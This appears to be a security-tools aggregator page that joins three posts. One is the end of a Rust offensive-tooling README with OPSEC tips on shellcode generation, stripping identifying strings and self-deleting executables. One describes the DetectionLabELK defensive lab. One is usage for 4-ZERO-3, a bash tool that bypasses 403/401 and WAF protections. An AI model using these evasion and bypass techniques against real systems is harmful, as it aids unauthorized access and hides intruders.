This repo was compiled on Windows 10, so I would stick to it. As mentioned, OpenSSL binaries will have dependency issues that require OpenSSL and Perl to be installed. For the TCP SSL client/server, I recommend a static build due to dependencies on the hosts where you will execute the binaries. To create a project, execute:

cargo new <name>

This will automatically create the structured project folders with:

project
β”œβ”€β”€ Cargo.toml
└── src
    └── main.rs

Cargo.toml is the file that contains the dependencies and the configuration for the compilation. main.rs is the main file that will be compiled along with any potential directories that contain libraries.
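For reference, the generated Cargo.toml starts out close to the following (the edition value depends on your toolchain), and src/main.rs contains a stub main that prints "Hello, world!":

```toml
[package]
name = "project"
version = "0.1.0"
edition = "2021"

# Dependencies (crates) are listed here, e.g. winapi = "0.3"
[dependencies]
```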

For compiling the project, go into the project directory and execute:
cargo build

This will use your default toolchain. If you want to build the final "release" version execute:
cargo build --release

For static binaries, execute the following in the terminal before the build command:
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat"
set RUSTFLAGS=-C target-feature=+crt-static

If my code does not feel easy to read the way it is written,
you can also use the command below inside the project directory to format it in a better way:
cargo fmt

Certain examples might not compile and give you an error, since they might require a nightly
build of Rust with the latest features. To install it, just do:
rustup default nightly

The easiest place to find dependencies, or crates as they are called, is crates.io.

Cross Compiling

Cross-compiling requires following the instructions here. By installing different toolchains, you can cross-compile with the command below:
cargo build --target <toolchain>

To see the installed toolchains on your system do:
rustup toolchain list

For checking all the available targets you can install on your system, do:
rustup target list

For installing a new target, do:
rustup target add <target_name>

Optimizing executables for size

This repo contains a lot of configuration options and ideas about reducing the file size. Static binaries are usually quite big.

Pitfalls I found myself falling into

Be careful with \0 bytes: do not forget them for strings in memory. I lost a lot of time to this, but WinDbg always helped resolve it.

Interesting Rust libraries

  • WINAPI
  • WINAPI2
  • Windows - This is the official Microsoft one, which I have not played with much

OPSEC

  • Even though Rust has good advantages, it is quite difficult to get used to and it is not very intuitive.
  • Shellcode generation is another issue due to LLVM. I have found a few ways to approach this.
    Donut sometimes generates shellcode that works, but depending on how the project is made, it might not.
    In general, tools for shellcode generation should be made to host all code in the .text segment, which leads to this amazing repo. There is a shellcode sample in this project that shows how to structure your code for successful shellcode generation.
    In addition, this project also has a shellcode generator that grabs the .text segment of a binary and dumps the shellcode after executing some patches.
    That project reads the binary from a hard-coded location, so I made a fork that receives the path of the binary as an argument here.
  • Even if you remove all debug symbols, Rust can still keep references to your home directory in the binary. The only way I have found to remove this is to pass the following flag: --remap-path-prefix {your home directory}={some random identifier}. You can use bash variables to get your home directory and generate a random placeholder: --remap-path-prefix "$HOME"="$RANDOM". (By Yamakadi)
  • Alternatively, you can remove the home directory information by adding the following at the top of Cargo.toml:
    cargo-features = ["strip"]
  • Since Rust by default leaves a lot of things as strings in the binary, I mostly use this cargo.toml to avoid them and also reduce size,
    with the build command:
    cargo build --release -Z build-std=std,panic_abort -Z build-std-features=panic_immediate_abort --target x86_64-pc-windows-msvc
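For context, the kind of release profile that strips those strings and shrinks the binary typically looks like this (a sketch of common options, not the repo's exact cargo.toml):

```toml
[profile.release]
opt-level = "z"     # optimize for size rather than speed
lto = true          # link-time optimization across crates
codegen-units = 1   # slower builds, smaller output
panic = "abort"     # drop unwinding machinery and panic strings
strip = true        # strip symbols from the binary
```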

Other projects I have made in Rust

Projects in Rust that can be helpful

  • houdini - Helps make your executable self-delete


DetectionLabELK - A Fork From DetectionLab With ELK Stack Instead Of Splunk

28 November 2021 at 20:30
By: Zion3R


DetectionLabELK is a fork from Chris Long's DetectionLab with ELK stack instead of Splunk.


Description:

DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blue teams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices for system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.

Use cases:

A popular use case for DetectionLabELK is when you are considering adopting the MITRE ATT&CK framework and would like to develop detections for its tactics. You can use DetectionLabELK to quickly run atomic tests, see what logs are being generated, and compare them to your production environment. This way you can:

  • Validate that your production logging is working as expected.
  • Ensure that your SIEM is collecting the correct events.
  • Enhance alerts quality by reducing false positives and eliminating false negatives.
  • Minimize coverage gaps.

Lab Information:

Primary Lab Features:

  • Microsoft Advanced Threat Analytics is installed on the WEF machine, with the lightweight ATA gateway installed on the DC
  • Windows Event Forwarding along with Winlogbeat is pre-installed, and all indexes are pre-created on ELK. Technology add-ons for Windows are also preconfigured.
  • A custom Windows auditing configuration is set via GPO to include command line process auditing and additional OS-level logging
  • Palantir's Windows Event Forwarding subscriptions and custom channels are implemented
  • Powershell transcript logging is enabled. All logs are saved to \\wef\pslogs
  • osquery comes installed on each host and is pre-configured to connect to a Fleet server via TLS. Fleet is preconfigured with the configuration from Palantir's osquery Configuration
  • Sysmon is installed and configured using Olaf's open-sourced configuration
  • All autostart items are logged to Windows Event Logs via AutorunsToWinEventLog
  • SMBv1 Auditing is enabled

Lab Hosts:

  1. DC - Windows 2016 Domain Controller

    • WEF Server Configuration GPO
    • Powershell logging GPO
    • Enhanced Windows Auditing policy GPO
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards Sysmon & osquery)
    • Sysinternals Tools
    • Microsoft Advanced Threat Analytics Lightweight Gateway
  2. WEF - Windows 2016 Server

    • Microsoft Advanced Threat Analytics
    • Windows Event Collector
    • Windows Event Subscription Creation
    • Powershell transcription logging share
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards WinEventLog & Powershell & Sysmon & osquery)
    • Sysinternals tools
  3. Win10 - Windows 10 Workstation

    • Simulates employee workstation
    • Sysmon
    • osquery
    • Sysinternals Tools
  4. Logger - Ubuntu 18.04

    • Kibana
    • Fleet osquery Manager
    • Bro
    • Suricata
    • Elastic Beats Forwarder (Forwards Bro logs & Suricata & osquery)
    • Guacamole
    • Velociraptor

Requirements

  • 55GB+ of free disk space
  • 16GB+ of RAM
  • Vagrant 2.2.2 or newer
  • Virtualbox

Deployment Options

  1. Use Vagrant Cloud Boxes - ETA ~2 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install the Vagrant-Reload plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK/Vagrant" and execute vagrant up.
  2. Build Boxes From Scratch - ETA ~5 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install "Vagrant-Reload" plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK" base directory and build the lab by executing ./build.sh virtualbox (Mac & Linux) or ./build.ps1 virtualbox (Windows).

Troubleshooting:

  • To verify that the build process completed successfully, ensure you are in the DetectionLabELK/Vagrant directory and run vagrant status. The four machines (wef, dc, logger, and win10) should be running. If one of the machines is not running, execute vagrant reload <host>. If you would like to pause the whole lab, execute vagrant suspend and resume it using vagrant resume.
  • Deployment logs will be present in the Vagrant folder as vagrant_up_<host>.log

Lab Access:

Support: If you face any problem, please open a new issue and provide relevant log file.



4-ZERO-3 - 403/401 Bypass Methods + Bash Automation

28 November 2021 at 11:30
By: Zion3R


>_ Introduction

4-ZERO-3 is a tool to bypass 403/401 responses. This script contains all the possible techniques to do so.

  • NOTE: If you see multiple [200 OK]/bypasses in the output, you must check the Content-Length. If the Content-Length is the same for multiple [200 OK]/bypasses, they are false positives. The reason can be a "301/302" redirect or the "../" [Payload]. DON'T PANIC.
  • The script will print the cURL PAYLOAD if a possible bypass is found.

>_ Preview



>_ Help

$ bash 403-bypass.sh -h




>_ Usage / Modes

  • Scan with specific payloads:
    • [ --header ] Support HEADER based bypasses/payloads
      $ bash 403-bypass.sh -u https://target.com/secret --header
    • [ --protocol ] Support PROTOCOL based bypasses/payloads
      $ bash 403-bypass.sh -u https://target.com/secret --protocol
    • [ --port ] Support PORT based bypasses/payloads
      $ bash 403-bypass.sh -u https://target.com/secret --port
    • [ --HTTPmethod ] Support HTTP Method based bypasses/payloads
      $ bash 403-bypass.sh -u https://target.com/secret --HTTPmethod
    • [ --encode ] Support URL Encoded bypasses/payloads
      $ bash 403-bypass.sh -u https://target.com/secret --encode
    • [ --SQLi ] Support MySQL mod_Security & libinjection bypasses/payloads [** New **]
      $ bash 403-bypass.sh -u https://target.com/secret --SQLi
  • Complete Scan {includes all exploits/payloads} for an endpoint [ --exploit ]
    $ bash 403-bypass.sh -u https://target.com/secret --exploit

>_ Prerequisites
  • apt install curl [Debian]

